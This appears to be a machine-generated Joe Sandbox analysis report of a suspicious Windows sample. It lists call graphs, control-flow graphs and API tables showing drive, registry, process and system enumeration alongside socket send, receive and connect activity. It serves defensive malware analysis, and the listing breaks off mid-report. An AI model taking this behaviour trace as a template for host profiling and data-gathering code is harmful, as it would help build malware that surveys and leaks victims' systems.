74106->74107 74109 7210413 74107->74109 74109->74042 74111 7210333 GetLogicalDrives 74110->74111 74113 7210413 74111->74113 74113->74042 74115 721035c GetLogicalDrives 74114->74115 74117 7210413 74115->74117 74117->74042 74119 7210097 2 API calls 74118->74119 74120 7210089 74118->74120 74119->74120 74121 72102c3 GetLogicalDrives 74120->74121 74122 72102b7 GetLogicalDrives 74121->74122 74124 7210413 74122->74124 74124->74042 74126 7210116 74125->74126 74127 72102c3 GetLogicalDrives 74126->74127 74128 72102b7 GetLogicalDrives 74127->74128 74130 7210413 74128->74130 74130->74042 74132 72100f0 74131->74132 74133 72102c3 GetLogicalDrives 74132->74133 74134 72102b7 GetLogicalDrives 74133->74134 74136 7210413 74134->74136 74136->74042 74138 72102e5 GetLogicalDrives 74137->74138 74140 7210413 74138->74140 74140->74042 74142 72101b4 74141->74142 74143 72102c3 GetLogicalDrives 74142->74143 74144 72102b7 GetLogicalDrives 74143->74144 74146 7210413 74144->74146 74146->74042 74148 7210065 74147->74148 74149 7210097 2 API calls 74148->74149 74150 7210089 74149->74150 74151 72102c3 GetLogicalDrives 74150->74151 74152 72102b7 GetLogicalDrives 74151->74152 74154 7210413 74152->74154 74154->74042 74156 7210255 74155->74156 74157 72102c3 GetLogicalDrives 74156->74157 74158 72102b7 GetLogicalDrives 74157->74158 74160 7210413 74158->74160 74160->74042 74162 721003b 74161->74162 74163 721004b 3 API calls 74161->74163 74164 7210097 2 API calls 74162->74164 74163->74162 74165 7210089 74164->74165 74166 72102c3 GetLogicalDrives 74165->74166 74167 72102b7 GetLogicalDrives 74166->74167 74169 7210413 74167->74169 74169->74042 74171 7210238 74170->74171 74172 72102c3 GetLogicalDrives 74171->74172 74173 72102b7 GetLogicalDrives 74172->74173 74175 7210413 74173->74175 74175->74042 74177 72103d0 GetLogicalDrives 74176->74177 74179 7210413 74177->74179 74179->74042 74181 721035c GetLogicalDrives 74180->74181 74183 7210413 74181->74183 74183->74042 74185 7210137 74184->74185 74186 72102c3 GetLogicalDrives 74185->74186 74187 72102b7 GetLogicalDrives 74186->74187 74189 7210413 74187->74189 74189->74042 74191 7210297 74190->74191 74192 72102c3 GetLogicalDrives 74191->74192 74193 72102b7 GetLogicalDrives 74192->74193 74195 7210413 74193->74195 74195->74042 74197 7210204 74196->74197 74198 72102c3 GetLogicalDrives 74197->74198 74199 72102b7 GetLogicalDrives 74198->74199 74201 7210413 74199->74201 74201->74042 74203 721001b 74202->74203 74204 721004b 3 API calls 74203->74204 74205 721003b 74204->74205 74206 7210097 2 API calls 74205->74206 74207 7210089 74206->74207 74208 72102c3 GetLogicalDrives 74207->74208 74209 72102b7 GetLogicalDrives 74208->74209 74211 7210413 74209->74211 74211->74042 74213 7210249 74212->74213 74214 72102c3 GetLogicalDrives 74213->74214 74215 72102b7 GetLogicalDrives 74214->74215 74217 7210413 74215->74217 74217->74042 74219 721015d 74218->74219 74220 72102c3 GetLogicalDrives 74219->74220 74221 72102b7 GetLogicalDrives 74220->74221 74223 7210413 74221->74223 74223->74042 74225 7210218 74224->74225 74226 72102c3 GetLogicalDrives 74225->74226 74227 72102b7 GetLogicalDrives 74226->74227 74229 7210413 74227->74229 74229->74042 74231 72100db 74230->74231 74232 72102c3 GetLogicalDrives 74231->74232 74233 72102b7 GetLogicalDrives 74232->74233 74235 7210413 74233->74235 74235->74042 74237 72100a8 74236->74237 74238 72102c3 GetLogicalDrives 74237->74238 74239 72102b7 GetLogicalDrives 74238->74239 74241 7210413 74239->74241 74241->74042 74243 7210249 74242->74243 74244 72102c3 GetLogicalDrives 74243->74244 74245 72102b7 GetLogicalDrives 74244->74245 74247 7210413 74245->74247 74247->74042 74249 7210373 GetLogicalDrives 74248->74249 74251 7210413 74249->74251 74251->74042 74253 72101db 74252->74253 74254 72102c3 GetLogicalDrives 74253->74254 74255 72102b7 GetLogicalDrives 74254->74255 74257 7210413 74255->74257 74257->74042 74259 721026b 74258->74259 74260 72102c3 GetLogicalDrives 74259->74260 74261 72102b7 GetLogicalDrives 74260->74261 74263 7210413 74261->74263 74263->74042 74265 72100f8 74264->74265 74266 72102c3 GetLogicalDrives 74265->74266 74267 72102b7 GetLogicalDrives 74266->74267 74269 7210413 74267->74269 74269->74042 74271 72101f0 74270->74271 74272 72102c3 GetLogicalDrives 74271->74272 74273 72102b7 GetLogicalDrives 74272->74273 74275 7210413 74273->74275 74275->74042 74276 50b400 74277 50b425 74276->74277 74278 50b40b 74276->74278 74281 4d7770 74278->74281 74279 50b421 74282 4d77b6 recv 74281->74282 74283 4d7790 74281->74283 74287 4d77a3 74282->74287 74288 4d77d4 74282->74288 74283->74282 74284 4d7799 74283->74284 74286 4d77db 74284->74286 74284->74287 74293 4d72a0 _open 74286->74293 74292 4d72a0 _open 74287->74292 74288->74279 74290 4d77ec 74294 4dcb20 _open 74290->74294 74292->74288 74293->74290 74294->74288 74295 50e400 74296 50e412 74295->74296 74299 50e459 74295->74299 74297 50e422 74296->74297 74319 523030 _open 74296->74319 74320 5309d0 _open 74297->74320 74301 50e4a8 74299->74301 74304 50e495 74299->74304 74307 50b5a0 74299->74307 74304->74301 74306 50b5a0 _open 74304->74306 74305 50e42b 74321 5068b0 6 API calls 74305->74321 74306->74301 74308 50b5d2 74307->74308 74309 50b5c0 74307->74309 74308->74304 74309->74308 74310 50b713 74309->74310 74314 50b626 74309->74314 74323 514f40 _open 74310->74323 74312 50b65a 74312->74308 74313 50b72b 74312->74313 74315 50b737 74312->74315 74313->74308 74324 5150a0 _open 74313->74324 74314->74308 74314->74312 74314->74313 74314->74315 74322 5150a0 _open 74314->74322 74315->74308 74325 5150a0 _open 74315->74325 74319->74297 74320->74305 74321->74299 74322->74314 74323->74308 74324->74308 74325->74308 74326 50b3c0 74327 50b3cb 74326->74327 74328 50b3ee 74326->74328 74332 4d76a0 74327->74332 74343 509290 74327->74343 74329 50b3ea 74333 4d76e6 send 74332->74333 74334 4d76c0 74332->74334 74337 4d76d3 74333->74337 74339 4d7704 74333->74339 74334->74333 74335 4d76c9 74334->74335 74336 4d770b 74335->74336 74335->74337 74358 4d72a0 _open 74336->74358 74357 4d72a0 _open 74337->74357 74339->74329 74341 4d771c 74359 4dcb20 _open 74341->74359 74344 4d76a0 2 API calls 74343->74344 74345 5092e5 74344->74345 74346 5093c3 74345->74346 74348 5092f3 74345->74348 74350 509392 74346->74350 74360 4ed090 _open 74346->74360 74347 5093be 74347->74329 74348->74350 74353 509335 WSAIoctl 74348->74353 74350->74347 74362 5150a0 _open 74350->74362 74351 5093f7 74361 514f40 _open 74351->74361 74353->74350 74355 509366 74353->74355 74355->74350 74356 509371 setsockopt 74355->74356 74356->74350 74357->74339 74358->74341 74359->74339 74360->74351 74361->74350 74362->74347 74363 510700 74372 510719 74363->74372 74377 51099d 74363->74377 74366 5109f6 74389 4d75a0 74366->74389 74369 510a35 74393 514f40 _open 74369->74393 74370 5109b5 74370->74377 74388 5150a0 _open 74370->74388 74372->74366 74372->74369 74372->74370 74372->74377 74381 4d7310 _open 74372->74381 74382 50b8e0 _open 74372->74382 74383 53f570 _open 74372->74383 74384 4feb30 _open 74372->74384 74385 5313a0 _open 74372->74385 74386 5539a0 _open 74372->74386 74387 4feae0 _open 74372->74387 74379 4d75a0 _open 74379->74377 74381->74372 74382->74372 74383->74372 74384->74372 74385->74372 74386->74372 74387->74372 74388->74377 74390 4d75aa 74389->74390 74392 4d75d1 74389->74392 74390->74392 74394 4d72a0 _open 74390->74394 74392->74379 74393->74377 74394->74392 74616 4d29ff FindFirstFileA 74617 4d2a31 74616->74617 74618 4d2a5c RegOpenKeyExA 74617->74618 74619 4d2a93 74618->74619 74620 4d2ade CharUpperA 74619->74620 74622 4d2b0a 74620->74622 74621 4d2bf9 QueryFullProcessImageNameA 74623 4d2c3b CloseHandle 74621->74623 74622->74621 74625 4d2c64 74623->74625 74624 4d2df1 CloseHandle 74626 4d2e23 74624->74626 74625->74624 74395 4d3d5e 74396 4d3d30 74395->74396 74396->74395 74397 4d3d90 74396->74397 74401 4e0ab0 74396->74401 74404 4dfcb0 7 API calls 74397->74404 74400 4d3dc1 74405 4e05b0 74401->74405 74404->74400 74406 4e07c7 74405->74406 74414 4e05bd 74405->74414 74406->74396 74407 4e066a 74424 50dec0 74407->74424 74411 4e067b 74415 4e06f0 74411->74415 74420 4e07ce 74411->74420 74431 4e73b0 _open 74411->74431 74414->74406 74414->74407 74414->74420 74429 4e03c0 _open 74414->74429 74430 4e7450 _open 74414->74430 74416 4e0707 WSAEventSelect 74415->74416 74417 4e07ef 74415->74417 74419 4d76a0 2 API calls 74415->74419 74416->74415 74416->74420 74417->74420 74421 4e0847 74417->74421 74433 4e6fa0 74417->74433 74419->74415 74432 4e7380 _open 74420->74432 74421->74420 74422 4e09e8 WSAEnumNetworkEvents 74421->74422 74423 4e09d0 WSAEventSelect 74421->74423 74422->74421 74422->74423 74423->74421 74423->74422 74425 50df1e 74424->74425 74427 50dece 74424->74427 74437 50df30 74427->74437 74428 50def9 74428->74411 74429->74414 74430->74414 74431->74411 74432->74406 74434 4e6fd4 74433->74434 74436 4e6feb 74433->74436 74435 4e7207 select 74434->74435 74434->74436 74435->74436 74436->74421 74439 50df44 74437->74439 74438 50dfb5 74438->74428 74439->74438 74441 50dfb9 74439->74441 74443 4e7450 _open 74439->74443 74444 4e7380 _open 74441->74444 74443->74439 74444->74438 74445 50f6c3 74448 50f6e3 74445->74448 74453 50f7b9 74445->74453 74446 50f7f4 74447 50f800 74446->74447 74465 510c80 _open 74446->74465 74451 50f72e 74448->74451 74461 5150a0 _open 74448->74461 74451->74446 74456 50f743 74451->74456 74452 510034 74453->74447 74453->74448 74464 514fd0 _open 74453->74464 74456->74447 74458 5150a0 _open 74456->74458 74462 4dfa50 _open 74456->74462 74463 510d30 _open 74456->74463 74458->74456 74459 50ff5b 74459->74452 74466 5150a0 _open 74459->74466 74461->74451 74462->74456 74463->74456 74464->74448 74465->74459 74466->74452 74627 4e1139 74652 50baa0 74627->74652 74629 4e1148 74630 4e1512 74629->74630 74636 4e1161 74629->74636 74641 4e1527 74630->74641 74658 4dfec0 7 API calls 74630->74658 74632 4e1f58 74660 4e0150 _open 74632->74660 74633 4e1fb0 74644 4e0f00 74633->74644 74662 4e4940 _open 74633->74662 74634 4e0f69 74634->74632 74634->74633 74634->74644 74636->74634 74657 4e0150 _open 74636->74657 74637 4e0f21 74638 4e1f61 74642 4e1fa6 74638->74642 74661 50d4d0 6 API calls 74638->74661 74641->74634 74659 4e22d0 7 API calls 74641->74659 74642->74637 74642->74644 74647 4d75a0 _open 74642->74647 74651 4e208a 74642->74651 74644->74637 74656 4e0150 _open 74644->74656 74648 4e2057 74647->74648 74649 4d75a0 _open 74648->74649 74649->74651 74663 4e3900 _open 74651->74663 74653 50bb60 74652->74653 74655 50bac7 74652->74655 74653->74629 74655->74653 74664 4f05b0 _open 74655->74664 74656->74637 74657->74634 74658->74641 74659->74634 74660->74638 74661->74642 74662->74642 74663->74644 74664->74653 74467 583c00 74468 583c23 74467->74468 74470 583c0d 74467->74470 74468->74470 74471 59b180 74468->74471 74474 59b19b 74471->74474 74478 59b2e3 74471->74478 74475 59b2a9 getsockname 74474->74475 74477 59b020 closesocket 74474->74477 74474->74478 74479 59af30 74474->74479 74483 59b060 74474->74483 74488 59b020 74475->74488 74477->74474 74478->74470 74480 59af4c 74479->74480 74481 59af63 socket 74479->74481 74480->74481 74482 59af52 74480->74482 74481->74474 74482->74474 74487 59b080 74483->74487 74484 59b0b0 connect 74485 59b0bf WSAGetLastError 74484->74485 74486 59b0ea 74485->74486 74485->74487 74486->74474 74487->74484 74487->74485 74487->74486 74489 59b029 74488->74489 74490 59b052 74488->74490 74491 59b04b closesocket 74489->74491 74492 59b03e 74489->74492 74490->74474 74491->74490 74492->74474 74665 584720 74669 584728 74665->74669 74666 584733 74668 584774 74669->74666 74676 58476c 74669->74676 74677 585540 socket ioctlsocket connect getsockname closesocket 74669->74677 74671 58482e 74671->74676 74678 589270 74671->74678 74673 584860 74683 584950 74673->74683 74675 584878 74676->74675 74691 5830a0 socket ioctlsocket connect getsockname closesocket 74676->74691 74677->74671 74692 58a440 74678->74692 74680 589297 74682 5892ab 74680->74682 74722 58bbe0 socket ioctlsocket connect getsockname closesocket 74680->74722 74682->74673 74684 584966 74683->74684 74688 5849c5 74684->74688 74690 5849b9 74684->74690 74724 58b590 if_indextoname 74684->74724 74686 584aa0 gethostname 74686->74688 74686->74690 74687 584a3e 74687->74688 74725 58bbe0 socket ioctlsocket connect getsockname closesocket 74687->74725 74688->74676 74690->74686 74690->74688 74691->74668 74720 58a46b 74692->74720 74693 58a4db 74694 58aa03 RegOpenKeyExA 74693->74694 74708 58ad14 74693->74708 74695 58ab70 RegOpenKeyExA 74694->74695 74696 58aa27 RegQueryValueExA 74694->74696 74697 58ac34 RegOpenKeyExA 74695->74697 74719 58ab90 74695->74719 74698 58aacc RegQueryValueExA 74696->74698 74699 58aa71 74696->74699 74700 58acf8 RegOpenKeyExA 74697->74700 74718 58ac54 74697->74718 74701 58ab0e 74698->74701 74702 58ab66 RegCloseKey 74698->74702 74699->74698 74704 58aa85 RegQueryValueExA 74699->74704 74703 58ad56 RegEnumKeyExA 74700->74703 74700->74708 74701->74702 74707 58ab1e RegQueryValueExA 74701->74707 74702->74695 74705 58ad9b 74703->74705 74703->74708 74706 58aab3 74704->74706 74709 58ae16 RegOpenKeyExA 74705->74709 74706->74698 74712 58ab4c 74707->74712 74708->74680 74710 58addf RegEnumKeyExA 74709->74710 74711 58ae34 RegQueryValueExA 74709->74711 74710->74708 74710->74709 74713 58af43 RegQueryValueExA 74711->74713 74721 58adaa 74711->74721 74712->74702 74714 58b052 RegQueryValueExA 74713->74714 74713->74721 74715 58adc7 RegCloseKey 74714->74715 74714->74721 74715->74710 74717 58afa0 RegQueryValueExA 74717->74721 74718->74700 74719->74697 74720->74693 74723 58b830 if_indextoname 74720->74723 74721->74713 74721->74714 74721->74715 74721->74717 74722->74682 74723->74693 74724->74687 74725->74690 74493 59a080 74496 599740 74493->74496 74495 59a09b 74497 599780 74496->74497 74501 59975d 74496->74501 74498 599925 RegOpenKeyExA 74497->74498 74497->74501 74499 59995a RegQueryValueExA 74498->74499 74498->74501 74500 599986 RegCloseKey 74499->74500 74500->74501 74501->74495 74502 4d2f17 74510 4d2f2c 74502->74510 74503 4d31d3 74504 4d2fb3 RegOpenKeyExA 74504->74510 74505 4d315c RegEnumKeyExA 74506 4d31b2 RegCloseKey 74505->74506 74505->74510 74506->74510 74507 4d3046 RegOpenKeyExA 74508 4d3089 RegQueryValueExA 74507->74508 74507->74510 74509 4d313b RegCloseKey 74508->74509 74508->74510 74509->74510 74510->74503 74510->74504 74510->74505 74510->74507 74510->74509 74511 4d31d7 74512 4d31f4 74511->74512 74513 4d3200 74512->74513 74514 4d32dc CloseHandle 74512->74514 74514->74513 74726 725035b 74727 7250328 74726->74727 74729 7250337 Process32FirstW 74727->74729 74732 725033f Process32FirstW 74727->74732 74731 72503b7 74729->74731 74732->74729

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 510 4d255d-4d2614 call 859f70 GetSystemInfo call 959af0 call 959ce0 GlobalMemoryStatusEx call 959af0 call 959ce0 592 4d2619 call 72101e0 510->592 593 4d2619 call 72102a2 510->593 594 4d2619 call 72101e5 510->594 595 4d2619 call 72100a5 510->595 596 4d2619 call 72100e4 510->596 597 4d2619 call 7210367 510->597 598 4d2619 call 72101ac 510->598 599 4d2619 call 721016f 510->599 600 4d2619 call 7210230 510->600 601 4d2619 call 7210278 510->601 602 4d2619 call 72100bc 510->602 603 4d2619 call 721023f 510->603 604 4d2619 call 721013f 510->604 605 4d2619 call 72101fe 510->605 606 4d2619 call 7210000 510->606 607 4d2619 call 72102c3 510->607 608 4d2619 call 7210284 510->608 609 4d2619 call 72103c7 510->609 610 4d2619 call 7210346 510->610 611 4d2619 call 7210008 510->611 612 4d2619 call 721020b 510->612 613 4d2619 call 721004b 510->613 614 4d2619 call 721024f 510->614 615 4d2619 call 72102cf 510->615 616 4d2619 call 7210193 510->616 617 4d2619 call 7210112 510->617 618 4d2619 call 7210152 510->618 619 4d2619 call 7210354 510->619 620 4d2619 call 7210057 510->620 621 4d2619 call 7210097 510->621 622 4d2619 call 7210396 510->622 623 4d2619 call 72101d9 510->623 624 4d2619 call 721025e 510->624 521 4d261b-4d2620 522 4d277c-4d2904 call 959af0 call 959ce0 KiUserCallbackDispatcher call 959af0 call 959ce0 call 959af0 call 959ce0 call 858e38 call 858be0 call 858bd0 FindFirstFileW 521->522 523 4d2626-4d2637 call 9598f0 521->523 570 4d2928-4d292c 522->570 571 4d2906-4d2926 FindNextFileW 522->571 528 4d2754-4d275c 523->528 530 4d263c-4d264f GetDriveTypeA 528->530 531 4d2762-4d2777 call 959ce0 528->531 533 4d2655-4d2685 GetDiskFreeSpaceExA 530->533 534 4d2743-4d2751 call 858b98 530->534 531->522 533->534 537 4d268b-4d273e call 959bc0 call 959c50 call 959ce0 call 9599e0 call 959ce0 call 9599e0 call 959ce0 call 958050 533->537 534->528 537->534 572 4d292e 570->572 573 4d2932-4d296f call 959af0 call 959ce0 call 858e78 570->573 571->570 571->571 572->573 579 4d2974-4d2979 573->579 580 4d29a9-4d29fe call 85a2b0 call 959af0 call 959ce0 579->580 581 4d297b-4d29a4 call 959af0 call 959ce0 579->581 581->580 592->521 593->521 594->521 595->521 596->521 597->521 598->521 599->521 600->521 601->521 602->521 603->521 604->521 605->521 606->521 607->521 608->521 609->521 610->521 611->521 612->521 613->521 614->521 615->521 616->521 617->521 618->521 619->521 620->521 621->521 622->521 623->521 624->521
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE ref: 004D2579
                                                      • GlobalMemoryStatusEx.KERNELBASE ref: 004D25CC
                                                      • GetDriveTypeA.KERNELBASE ref: 004D2647
                                                      • GetDiskFreeSpaceExA.KERNELBASE ref: 004D267E
                                                      • KiUserCallbackDispatcher.NTDLL ref: 004D27E2
                                                      • FindFirstFileW.KERNELBASE ref: 004D28F8
                                                      • FindNextFileW.KERNELBASE ref: 004D291F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                                      • String ID: ;%M$@$`
                                                      • API String ID: 3271271169-1184465558
                                                      • Opcode ID: 6db2d274553307b7f6a938f0335c23a2238765f888f0b41b61a059c31da86d62
                                                      • Instruction ID: 3ff606f6a3198642eca3f10a5b37854391ebd6b603ff3279bfd5459927befad1
                                                      • Opcode Fuzzy Hash: 6db2d274553307b7f6a938f0335c23a2238765f888f0b41b61a059c31da86d62
                                                      • Instruction Fuzzy Hash: 12D1A7B4908319DFDB10EF69C58569EBBF0BF84344F00896AE898D7311E7749A88CF52

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1046 4d29ff-4d2a2f FindFirstFileA 1047 4d2a38 1046->1047 1048 4d2a31-4d2a36 1046->1048 1049 4d2a3d-4d2a91 call 959c50 call 959ce0 RegOpenKeyExA 1047->1049 1048->1049 1054 4d2a9a 1049->1054 1055 4d2a93-4d2a98 1049->1055 1056 4d2a9f-4d2b0c call 959c50 call 959ce0 CharUpperA call 858da0 1054->1056 1055->1056 1064 4d2b0e-4d2b13 1056->1064 1065 4d2b15 1056->1065 1066 4d2b1a-4d2b92 call 959c50 call 959ce0 call 858e80 call 858e70 1064->1066 1065->1066 1075 4d2bcc-4d2c66 QueryFullProcessImageNameA CloseHandle call 858da0 1066->1075 1076 4d2b94-4d2ba3 1066->1076 1086 4d2c6f 1075->1086 1087 4d2c68-4d2c6d 1075->1087 1079 4d2ba5-4d2bae 1076->1079 1080 4d2bb0-4d2bc0 call 858e68 1076->1080 1079->1075 1083 4d2bc5-4d2bca 1080->1083 1083->1075 1083->1076 1088 4d2c74-4d2ce9 call 959c50 call 959ce0 call 858e80 call 858e70 1086->1088 1087->1088 1097 4d2dcf-4d2e1c call 959c50 call 959ce0 CloseHandle 1088->1097 1098 4d2cef-4d2d49 call 858bb0 call 858da0 1088->1098 1139 4d2e21 call 72a0399 1097->1139 1140 4d2e21 call 72a037e 1097->1140 1141 4d2e21 call 72a039e 1097->1141 1142 4d2e21 call 72a036c 1097->1142 1143 4d2e21 call 72a0387 1097->1143 1111 4d2d99-4d2dad 1098->1111 1112 4d2d4b-4d2d63 call 858da0 1098->1112 1107 4d2e23-4d2e2e 1109 4d2e37 1107->1109 1110 4d2e30-4d2e35 1107->1110 1114 4d2e3c-4d2ed6 call 959c50 call 959ce0 1109->1114 1110->1114 1111->1097 1112->1111 1118 4d2d65-4d2d7d call 858da0 1112->1118 1128 4d2ed8-4d2ee1 1114->1128 1129 4d2eea 1114->1129 1118->1111 1124 4d2d7f-4d2d97 call 858da0 1118->1124 1124->1111 1131 4d2daf-4d2dc9 call 858e68 1124->1131 1128->1129 1132 4d2ee3-4d2ee8 1128->1132 1130 4d2eef-4d2f16 call 959c50 call 959ce0 1129->1130 1131->1097 1131->1098 1132->1130 1139->1107 1140->1107 1141->1107 1142->1107 1143->1107
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000BA9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012885900.0000000000BAC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000D36000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000E50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F29000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F30000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012906712.0000000000F40000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013313748.0000000000F41000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013508778.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2013531411.00000000010FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4d0000_HrIrtCXI3s.jbxd
                                                      Similarity
                                                      • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                      • String ID: 0
                                                      • API String ID: 2406880114-4108050209
                                                      • Opcode ID: c50865c4918163140ef8aa17fac5ac0729ebcf96d1e654c977f1743709cf660a
                                                      • Instruction ID: 09e0bc92719d4729ed576785a9ec895c5e6996d695489ef4fd015ee1ffd4d41d
                                                      • Opcode Fuzzy Hash: c50865c4918163140ef8aa17fac5ac0729ebcf96d1e654c977f1743709cf660a
                                                      • Instruction Fuzzy Hash: 45E1D9B4909305DFDB50EF68D98569EBBF4EF84304F40886AE898DB350EB749948CF42

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1196 4e05b0-4e05b7 1197 4e07ee 1196->1197 1198 4e05bd-4e05d4 1196->1198 1199 4e05da-4e05e6 1198->1199 1200 4e07e7-4e07ed 1198->1200 1199->1200 1201 4e05ec-4e05f0 1199->1201 1200->1197 1202 4e05f6-4e0620 call 4e7350 call 4d70b0 1201->1202 1203 4e07c7-4e07cc 1201->1203 1208 4e066a-4e068c call 50dec0 1202->1208 1209 4e0622-4e0624 1202->1209 1203->1200 1214 4e07d6-4e07e3 call 4e7380 1208->1214 1215 4e0692-4e06a0 1208->1215 1211 4e0630-4e0655 call 4d70d0 call 4e03c0 call 4e7450 1209->1211 1235 4e07ce 1211->1235 1236 4e065b-4e0668 call 4d70e0 1211->1236 1214->1200 1218 4e06f4-4e06f6 1215->1218 1219 4e06a2-4e06a4 1215->1219 1224 4e07ef-4e082b call 4e3000 1218->1224 1225 4e06fc-4e06fe 1218->1225 1222 4e06b0-4e06e4 call 4e73b0 1219->1222 1222->1214 1241 4e06ea-4e06ee 1222->1241 1239 4e0a2f-4e0a35 1224->1239 1240 4e0831-4e0837 1224->1240 1229 4e072c-4e0754 1225->1229 1230 4e075f-4e078b 1229->1230 1231 4e0756-4e075b 1229->1231 1253 4e0700-4e0703 1230->1253 1254 4e0791-4e0796 1230->1254 1237 4e075d 1231->1237 1238 4e0707-4e0719 WSAEventSelect 1231->1238 1235->1214 1236->1208 1236->1211 1244 4e0723-4e0726 1237->1244 1238->1214 1243 4e071f 1238->1243 1249 4e0a3c-4e0a52 1239->1249 1250 4e0a37-4e0a3a 1239->1250 1246 4e0839-4e084c call 4e6fa0 1240->1246 1247 4e0861-4e087e 1240->1247 1241->1222 1248 4e06f0 1241->1248 1243->1244 1244->1224 1244->1229 1263 4e0a9c-4e0aa4 1246->1263 1264 4e0852 1246->1264 1260 4e0882-4e088d 1247->1260 1248->1218 1249->1214 1251 4e0a58-4e0a81 call 4e2f10 1249->1251 1250->1249 1251->1214 1267 4e0a87-4e0a97 call 4e6df0 1251->1267 1253->1238 1254->1253 1257 4e079c-4e07c2 call 4d76a0 1254->1257 1257->1253 1265 4e0893-4e08b1 1260->1265 1266 4e0970-4e0975 1260->1266 1263->1214 1264->1247 1269 4e0854-4e085f 1264->1269 1270 4e08c8-4e08f7 1265->1270 1272 4e097b-4e0989 call 4d70b0 1266->1272 1273 4e0a19-4e0a2c 1266->1273 1267->1214 1269->1260 1280 4e08fd-4e0925 1270->1280 1281 4e08f9-4e08fb 1270->1281 1272->1273 1279 4e098f-4e099e 1272->1279 1273->1239 1282 4e09b0-4e09c1 call 4d70d0 1279->1282 1283 4e0928-4e093f 1280->1283 1281->1283 1287 4e09c3-4e09c7 1282->1287 1288 4e09a0-4e09ae call 4d70e0 1282->1288 1289 4e0945-4e096b 1283->1289 1290 4e08b3-4e08c2 1283->1290 1292 4e09e8-4e0a03 WSAEnumNetworkEvents 1287->1292 1288->1273 1288->1282 1289->1290 1290->1266 1290->1270 1294 4e0a05-4e0a17 1292->1294 1295 4e09d0-4e09e6 WSAEventSelect 1292->1295 1294->1295 1295->1288 1295->1292
                                                      APIs
                                                      • WSAEventSelect.WS2_32(?,?,?), ref: 004E0712
                                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 004E09DD
                                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 004E09FC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2012267645.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                                      • Associated: 00000000.00000002.2012236196.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2012267645.0000000000A41000.00000040.00000001.01000000.00000003.sdmpDownload File
